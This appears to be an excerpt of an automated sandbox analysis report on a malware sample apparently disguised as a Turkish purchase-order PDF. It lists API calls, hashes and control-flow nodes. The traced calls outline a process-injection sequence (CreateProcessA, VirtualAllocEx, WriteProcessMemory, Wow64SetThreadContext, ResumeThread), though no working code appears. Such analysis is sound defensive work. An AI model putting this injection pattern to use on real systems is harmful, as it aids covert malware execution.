                                Control-flow Graph (function at 617c3ec, calls CallWindowProcW and the internal routine at 6176dac; rendered graph not reproduced)
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0617D789
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: cf304a51fa1e90488cdfdd2805b774055999515ab921697fdc27ce887b630efc
                                • Instruction ID: 2507fe6a06f1e5946b2ed1c5a3d6cc52d47f550bb3b72d9c1fd4dbe3cb3d9e0d
                                • Opcode Fuzzy Hash: cf304a51fa1e90488cdfdd2805b774055999515ab921697fdc27ce887b630efc
                                • Instruction Fuzzy Hash: 724129B4D00349CFDB54CF99C888BAABBF5FF88314F248459E559AB321D770A841CBA1

                                Control-flow Graph (function at 617e40c, calls OleGetClipboard; rendered graph not reproduced)
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: c35b26972641283c7204390eed044d834dbd15c83983993cd50075e527c55c65
                                • Instruction ID: 26c68a93f1441a9b6115e7f5967aca7c9719a999865f237591d4bdb7d92bbd5e
                                • Opcode Fuzzy Hash: c35b26972641283c7204390eed044d834dbd15c83983993cd50075e527c55c65
                                • Instruction Fuzzy Hash: D63112B4D01248DFDB54CF99D984BCEBBF1AF48304F248059E445BB291DBB49845CF60

                                Control-flow Graph (function at 617e418, calls OleGetClipboard; rendered graph not reproduced)
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 470a0b5f3e23c48eeb58d38355d87ba9479e8af4a8fd826df454ab01c9809e61
                                • Instruction ID: 332afb01b5453e6110d8079f7ddc279ea2d8edc19ca711f996b6007a14143f40
                                • Opcode Fuzzy Hash: 470a0b5f3e23c48eeb58d38355d87ba9479e8af4a8fd826df454ab01c9809e61
                                • Instruction Fuzzy Hash: 3631E0B0D01208DFDB54CF99C984BCEBBF5AF48314F248069E405BB290DBB5A885CBA5

                                Control-flow Graph (function at 617c830, calls DuplicateHandle; rendered graph not reproduced)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0617C8BF
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: cc97c73a419527adf1091175e8dee160e82178dc3442e4495e242e0902f40d28
                                • Instruction ID: a1237dbdc916f89bbdda605f55bd16a6f782e7e6718c827993e0c45fc134d39a
                                • Opcode Fuzzy Hash: cc97c73a419527adf1091175e8dee160e82178dc3442e4495e242e0902f40d28
                                • Instruction Fuzzy Hash: BF21E3B5D00248DFDB10CFA9D984AEEFBF5EB48310F14842AE958A7251D374A955CFA0

                                Control-flow Graph (function at 617c838, calls DuplicateHandle; rendered graph not reproduced)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0617C8BF
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 7264fc0824ad4b5bb7457f0592f65bd85823ac3f8fbeaa574157a31cba2e9859
                                • Instruction ID: 9a645d65015c17d3a3748d2894fd8af2a69087b4e5fb26ee92e09d991bd1d061
                                • Opcode Fuzzy Hash: 7264fc0824ad4b5bb7457f0592f65bd85823ac3f8fbeaa574157a31cba2e9859
                                • Instruction Fuzzy Hash: 3921E4B5D002089FDB10CF9AD984ADEFBF4FB48310F14842AE958A7350D374A944CFA1

                                Control-flow Graph (function at 2ab7253, calls DeleteFileW; rendered graph not reproduced)
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 02AB72C8
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544611868.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_2ab0000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 4f066c50d082390ef934c84d8e34dd5140ae4e4a832c63ab74fcad0ab4b124b6
                                • Instruction ID: 5d384652f581b5ba3f60664fc2b9a8920afde31af3ed1630ebfcf8168b3756b2
                                • Opcode Fuzzy Hash: 4f066c50d082390ef934c84d8e34dd5140ae4e4a832c63ab74fcad0ab4b124b6
                                • Instruction Fuzzy Hash: 7C2158B1C006599FDB14CFAAC5447EEFBF4EF48320F148169D858A7241D778A945CFA0

                                Control-flow Graph (function at 2ab7258, calls DeleteFileW; rendered graph not reproduced)
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 02AB72C8
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544611868.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_2ab0000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 78d280783a49aac6ab99a46399bea58176cc6db0bccbfac9b37381b7f0d125e9
                                • Instruction ID: 0b6423759b842a8dbe6795a4352b3dac562e06abf019166c46109409bb4b0ab1
                                • Opcode Fuzzy Hash: 78d280783a49aac6ab99a46399bea58176cc6db0bccbfac9b37381b7f0d125e9
                                • Instruction Fuzzy Hash: D81147B2C0065A9FDB10CF9AC5447EEFBF4EF48320F15812AE818A7241D778A944CFA1

                                Control-flow Graph (function at 6176c78, calls GetModuleHandleW; rendered graph not reproduced)
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06177A96
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 5c078a4eda86da977f09673d5fe8357f0fbaf1e69bfbac1104c56b4cb1ac75ee
                                • Instruction ID: e938b18a6af51bab89b050ad805cc88f770a3ec768aa141cde9c7ca03ee064c7
                                • Opcode Fuzzy Hash: 5c078a4eda86da977f09673d5fe8357f0fbaf1e69bfbac1104c56b4cb1ac75ee
                                • Instruction Fuzzy Hash: 03110FB5C007498FEB10DF9AC844BDEFBF4EB88210F14882AD859B7250D375A645CFA1

                                Control-flow Graph (function at 6177a2a, calls GetModuleHandleW; rendered graph not reproduced)
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06177A96
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 6b3f5c61e7b521ce0f44469574a91ce944cb100aa5766476d02209ae925cdea8
                                • Instruction ID: 15b6491253e9d17788ab49a14094c412c279f8cf8c6de7e5d92e5442c25951f3
                                • Opcode Fuzzy Hash: 6b3f5c61e7b521ce0f44469574a91ce944cb100aa5766476d02209ae925cdea8
                                • Instruction Fuzzy Hash: 7C110FB6C007498FEB10DF9AC944BDEFBF4AB88310F14842AD859B7250C379A645CFA1
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0617D9DD), ref: 0617DA67
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 839372f5012e79eaf6833bbba5d95c1065b26458e35d3bbec022226476fb2925
                                • Instruction ID: 70287041243351c8afafa5da2cf59c810dd8b9507c83fcf4d46357a520f788e8
                                • Opcode Fuzzy Hash: 839372f5012e79eaf6833bbba5d95c1065b26458e35d3bbec022226476fb2925
                                • Instruction Fuzzy Hash: D31110B1804348CFDB10DF9AD484B9EBBF4EF48320F20842AD959A7250C374A944CBA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 0617E325
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 76b91f8d0cabb01bbfb134513530c64237684ade37f174f0a8fecb7c3818c872
                                • Instruction ID: 71cd1652ce92f13f7650942bfb66fa0e8e605c381f3cdf14bf5b80eeb4fdb6d2
                                • Opcode Fuzzy Hash: 76b91f8d0cabb01bbfb134513530c64237684ade37f174f0a8fecb7c3818c872
                                • Instruction Fuzzy Hash: 511133B08043488FDB10DF9AC444BDEFBF4EB48310F108869D558A7210C375A944CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 0617E325
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: e0920b6b65acdad99f733cd549621fd9bbbc84ec66e5ab04484bd281ce245dd5
                                • Instruction ID: c9eb8acc68079dd89459987597889af5a8649485e852a560c3a461ec357a8406
                                • Opcode Fuzzy Hash: e0920b6b65acdad99f733cd549621fd9bbbc84ec66e5ab04484bd281ce245dd5
                                • Instruction Fuzzy Hash: 7B1100B58002498FDB60CFAAD944BDEBBF4EB48324F24846AD559A7710C374A944CFA1
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0617D9DD), ref: 0617DA67
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 76322ddcd7250e740a5dab6b9fcf9efe4e7ad2ac71761bd4da9db4c49961e6d3
                                • Instruction ID: 1c5bc022f2620847a6a824e1d6bb66b982bd11ae25e09e93ed13436e792d7b82
                                • Opcode Fuzzy Hash: 76322ddcd7250e740a5dab6b9fcf9efe4e7ad2ac71761bd4da9db4c49961e6d3
                                • Instruction Fuzzy Hash: A21100B5C00249CFDB60CF9AD944BDEBBF4BF48324F24841AD559A7250C374A544CFA1
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: abbe984dbd15770f7daba0c5bd544c345d55de9b48c535c9cc2a147a9bc75f1a
                                • Instruction ID: 07c42e4174e2b14192b14fd3da143dd4861f68f390a36452c336f0cae7cd2e1e
                                • Opcode Fuzzy Hash: abbe984dbd15770f7daba0c5bd544c345d55de9b48c535c9cc2a147a9bc75f1a
                                • Instruction Fuzzy Hash: CB21D079604204DFDF14DF10D984B26BB69EB89318F28C569D84A8B256C33AD45BCA62
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c2955890d58e42ab8c701d580b327f5f0bfd85828566ef0c299d537d048ab5b
                                • Instruction ID: 24656dae06f4e167cddeaed6a920b27feb3a762dcbc2c9f23d2b2e4e00eb1e3b
                                • Opcode Fuzzy Hash: 7c2955890d58e42ab8c701d580b327f5f0bfd85828566ef0c299d537d048ab5b
                                • Instruction Fuzzy Hash: B821C27D504204EFDF04DF10D9C4B26FB69EB89218F20C56DE90A8B256C33AD44ACA61
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: efea3c08936a00b7e605333b9246a899184274c5c69618a9a9aceb76a5f0217f
                                • Instruction ID: 795ea33e76d0e8481e65cc184ed14fb27e6c442512700f73d7fc73a452ef33da
                                • Opcode Fuzzy Hash: efea3c08936a00b7e605333b9246a899184274c5c69618a9a9aceb76a5f0217f
                                • Instruction Fuzzy Hash: 312150795483809FCB02CF14D994715BF75EB46314F28C5EAD8498F2A7C33A985ACB62
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7f8a936f404c2f3a1d37781fb358592a8c8b0a691fbc29600f85b803e49f347
                                • Instruction ID: d217663c31f1ec500f77eff6f3a4bccca4a071af285f2d8c2c8b5b05e70fa63e
                                • Opcode Fuzzy Hash: a7f8a936f404c2f3a1d37781fb358592a8c8b0a691fbc29600f85b803e49f347
                                • Instruction Fuzzy Hash: B411DD79504280CFCB05CF10C9C4B15FFA1FB89318F24C6ADD84A8B656C33AD44ACB51

                                Execution Graph

                                Execution Coverage:9.4%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:173
                                Total number of Limit Nodes:13
                                Execution graph (rendered graph not reproduced). APIs reached by the traced nodes: GetModuleHandleW, LoadLibraryExW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA, DuplicateHandle, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, PostMessageW.

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 58 5afcbc0-5afcbe8 59 5afcbef-5afcc2f 58->59 60 5afcbea 58->60 61 5afcc30 59->61 60->59 62 5afcc37-5afcc53 61->62 63 5afcc5c-5afcc5d 62->63 64 5afcc55 62->64 81 5afcf35-5afcf3e 63->81 64->61 64->63 65 5afce89-5afce92 64->65 66 5afcd47-5afcd5a 64->66 67 5afcee7-5afcefd 64->67 68 5afcca6-5afccbb 64->68 69 5afcc62-5afcc66 64->69 70 5afcf02-5afcf19 64->70 71 5afccc0-5afccd7 64->71 72 5afcd5f-5afcd78 64->72 73 5afcf1e-5afcf30 64->73 74 5afcd7d-5afcd94 64->74 75 5afcddd-5afcdf0 64->75 76 5afccdc-5afccef 64->76 77 5afce58-5afce6d 64->77 78 5afce97-5afcebd call 5afc318 64->78 79 5afcc96-5afcca4 64->79 80 5afcdf5-5afce53 call 5afc6a8 64->80 64->81 82 5afccf4-5afcd0b 64->82 83 5afce72-5afce84 64->83 84 5afcd10-5afcd14 64->84 65->62 66->62 67->62 68->62 89 5afcc79-5afcc80 69->89 90 5afcc68-5afcc77 69->90 70->62 71->62 72->62 73->62 96 5afcd9e-5afcdd8 74->96 75->62 76->62 77->62 97 5afcec7-5afcee2 78->97 79->62 80->62 82->62 83->62 86 5afcd27-5afcd2e 84->86 87 5afcd16-5afcd25 84->87 94 5afcd35-5afcd42 86->94 87->94 91 5afcc87-5afcc94 89->91 90->91 91->62 94->62 96->62 97->62
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: UJ$yO6
                                • API String ID: 0-870398751
                                • Opcode ID: 96701c9f9be9db6ad559b3b17e33db90bc8d83555692f55ac6e680b0722fc110
                                • Instruction ID: af6b438b0b9ae2c64936a6b9e7e85569e0e7de25fcac1df72d5156282b102997
                                • Opcode Fuzzy Hash: 96701c9f9be9db6ad559b3b17e33db90bc8d83555692f55ac6e680b0722fc110
                                • Instruction Fuzzy Hash: 8BB10470E0921DDFCB18CFE6D99099EFBB2BF89310F10952AE515AB264DB349906CF44

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 102 5afc000-5afc025 103 5afc02c-5afc05d 102->103 104 5afc027 102->104 105 5afc05e 103->105 104->103 106 5afc065-5afc081 105->106 107 5afc08a-5afc08b 106->107 108 5afc083 106->108 109 5afc2af-5afc2b8 107->109 108->105 108->107 108->109 110 5afc1ac-5afc1c1 108->110 111 5afc268-5afc28f 108->111 112 5afc1c6-5afc1d4 108->112 113 5afc0a5-5afc0bc 108->113 114 5afc222-5afc234 108->114 115 5afc0be-5afc0d1 108->115 116 5afc0fd-5afc101 108->116 117 5afc17b-5afc181 call 5afa90c 108->117 118 5afc239-5afc24b 108->118 119 5afc1d9-5afc1f1 108->119 120 5afc1f6-5afc21d 108->120 121 5afc134-5afc176 108->121 122 5afc294-5afc2aa 108->122 123 5afc090-5afc0a3 108->123 124 5afc250-5afc263 108->124 110->106 111->106 112->106 113->106 114->106 125 5afc0e4-5afc0eb 115->125 126 5afc0d3-5afc0e2 115->126 127 5afc114-5afc11b 116->127 128 5afc103-5afc112 116->128 130 5afc187-5afc1a7 117->130 118->106 119->106 120->106 121->106 122->106 123->106 124->106 131 5afc0f2-5afc0f8 125->131 126->131 133 5afc122-5afc12f 127->133 128->133 130->106 131->106 133->106
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: !>c8$%)Y
                                • API String ID: 0-2922296349
                                • Opcode ID: 53a626d87d6b651c908abbf931b1f8e5c70bfd2983b6034aeed70f645cb0a482
                                • Instruction ID: 4d91a4afde48cea9f1cc4be702ca44171b57cc15160975799f3dcd80e2d44168
                                • Opcode Fuzzy Hash: 53a626d87d6b651c908abbf931b1f8e5c70bfd2983b6034aeed70f645cb0a482
                                • Instruction Fuzzy Hash: C281E571D0920D9FCB08CFE6E59199EFBB2FF89710F10942AE515AB224DB309942DF54

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0158D136
                                • GetCurrentThread.KERNEL32 ref: 0158D173
                                • GetCurrentProcess.KERNEL32 ref: 0158D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0158D209
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 4860de130a884ea6dcb8405ac42073167a6e5f4fe64e5e891e262949ee118fd9
                                • Instruction ID: e2786c78aba9e39986952e2c4213f218a9ff5bb68c08200b5244e3443f5a9a0c
                                • Opcode Fuzzy Hash: 4860de130a884ea6dcb8405ac42073167a6e5f4fe64e5e891e262949ee118fd9
                                • Instruction Fuzzy Hash: 7A5166B09013498FDB54DFAAD948BDEBBF1BF48314F208469D049AB3A1DB349944CB65

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0158D136
                                • GetCurrentThread.KERNEL32 ref: 0158D173
                                • GetCurrentProcess.KERNEL32 ref: 0158D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0158D209
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 4c41e86cbc9df8d2b62aaf8c287400054a38ff704b1dc221ce06b2a9385d959a
                                • Instruction ID: 18d7c60bd9878769d0694572eb13388ef11908a42369bb4a5847abfb79634a01
                                • Opcode Fuzzy Hash: 4c41e86cbc9df8d2b62aaf8c287400054a38ff704b1dc221ce06b2a9385d959a
                                • Instruction Fuzzy Hash: A15155B09013098FDB54DFAAD948BDEBBF1BF88314F208469E049AB290DB749944CB65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 47 66f5e50-66f5ea3 50 66f5ea5-66f5eb1 47->50 51 66f5eb3-66f5ee3 Wow64SetThreadContext 47->51 50->51 53 66f5eec-66f5f1c 51->53 54 66f5ee5-66f5eeb 51->54 54->53
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066F5ED6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID: n
                                • API String ID: 983334009-2013832146
                                • Opcode ID: ecfd8ec2945016b867494d69b437c1cbf2600eca6d9e0c417c9731850cb7de59
                                • Instruction ID: 5b9e21fe3a04358c88e15a75e6063ffc406f5ffad4c71987b250665941668b64
                                • Opcode Fuzzy Hash: ecfd8ec2945016b867494d69b437c1cbf2600eca6d9e0c417c9731850cb7de59
                                • Instruction Fuzzy Hash: 2B218771D003489FDB50DFAAC485BEEBBF4EF88314F14842AD559A7241CBB89984CFA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 137 66f66a4-66f6745 140 66f677e-66f679e 137->140 141 66f6747-66f6751 137->141 148 66f67d7-66f6806 140->148 149 66f67a0-66f67aa 140->149 141->140 142 66f6753-66f6755 141->142 143 66f6778-66f677b 142->143 144 66f6757-66f6761 142->144 143->140 146 66f6765-66f6774 144->146 147 66f6763 144->147 146->146 150 66f6776 146->150 147->146 157 66f683f-66f68f9 CreateProcessA 148->157 158 66f6808-66f6812 148->158 149->148 151 66f67ac-66f67ae 149->151 150->143 152 66f67d1-66f67d4 151->152 153 66f67b0-66f67ba 151->153 152->148 155 66f67be-66f67cd 153->155 156 66f67bc 153->156 155->155 159 66f67cf 155->159 156->155 169 66f68fb-66f6901 157->169 170 66f6902-66f6988 157->170 158->157 160 66f6814-66f6816 158->160 159->152 162 66f6839-66f683c 160->162 163 66f6818-66f6822 160->163 162->157 164 66f6826-66f6835 163->164 165 66f6824 163->165 164->164 167 66f6837 164->167 165->164 167->162 169->170 180 66f698a-66f698e 170->180 181 66f6998-66f699c 170->181 180->181 182 66f6990 180->182 183 66f699e-66f69a2 181->183 184 66f69ac-66f69b0 181->184 182->181 183->184 187 66f69a4 183->187 185 66f69b2-66f69b6 184->185 186 66f69c0-66f69c4 184->186 185->186 188 66f69b8 185->188 189 66f69d6-66f69dd 186->189 190 66f69c6-66f69cc 186->190 187->184 188->186 191 66f69df-66f69ee 189->191 192 66f69f4 189->192 190->189 191->192 194 66f69f5 192->194 194->194
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066F68E6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 842677f212ac0fa25d4a5879d0b660b534665b52e8c0390cd9912fe00ba6ba35
                                • Instruction ID: 6e33036ca553c51250d0c58063ea47a18a7c066fb0d065a569bcaf96634ab3cc
                                • Opcode Fuzzy Hash: 842677f212ac0fa25d4a5879d0b660b534665b52e8c0390cd9912fe00ba6ba35
                                • Instruction Fuzzy Hash: AFA16971D102199FEB60CFA8C841BEEBBB2FF48300F1485A9E919E7244DB749985CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 195 66f66b0-66f6745 197 66f677e-66f679e 195->197 198 66f6747-66f6751 195->198 205 66f67d7-66f6806 197->205 206 66f67a0-66f67aa 197->206 198->197 199 66f6753-66f6755 198->199 200 66f6778-66f677b 199->200 201 66f6757-66f6761 199->201 200->197 203 66f6765-66f6774 201->203 204 66f6763 201->204 203->203 207 66f6776 203->207 204->203 214 66f683f-66f68f9 CreateProcessA 205->214 215 66f6808-66f6812 205->215 206->205 208 66f67ac-66f67ae 206->208 207->200 209 66f67d1-66f67d4 208->209 210 66f67b0-66f67ba 208->210 209->205 212 66f67be-66f67cd 210->212 213 66f67bc 210->213 212->212 216 66f67cf 212->216 213->212 226 66f68fb-66f6901 214->226 227 66f6902-66f6988 214->227 215->214 217 66f6814-66f6816 215->217 216->209 219 66f6839-66f683c 217->219 220 66f6818-66f6822 217->220 219->214 221 66f6826-66f6835 220->221 222 66f6824 220->222 221->221 224 66f6837 221->224 222->221 224->219 226->227 237 66f698a-66f698e 227->237 238 66f6998-66f699c 227->238 237->238 239 66f6990 237->239 240 66f699e-66f69a2 238->240 241 66f69ac-66f69b0 238->241 239->238 240->241 244 66f69a4 240->244 242 66f69b2-66f69b6 241->242 243 66f69c0-66f69c4 241->243 242->243 245 66f69b8 242->245 246 66f69d6-66f69dd 243->246 247 66f69c6-66f69cc 243->247 244->241 245->243 248 66f69df-66f69ee 246->248 249 66f69f4 246->249 247->246 248->249 251 66f69f5 249->251 251->251
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066F68E6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 42fd9beddb99df19573dbfe68508cfaff8937739de7af4a5ac39d0fe0a2559ab
                                • Instruction ID: d8477c2f5977eec63719cfb35290f0e61a751356817a3f1226b60dfd3782539f
                                • Opcode Fuzzy Hash: 42fd9beddb99df19573dbfe68508cfaff8937739de7af4a5ac39d0fe0a2559ab
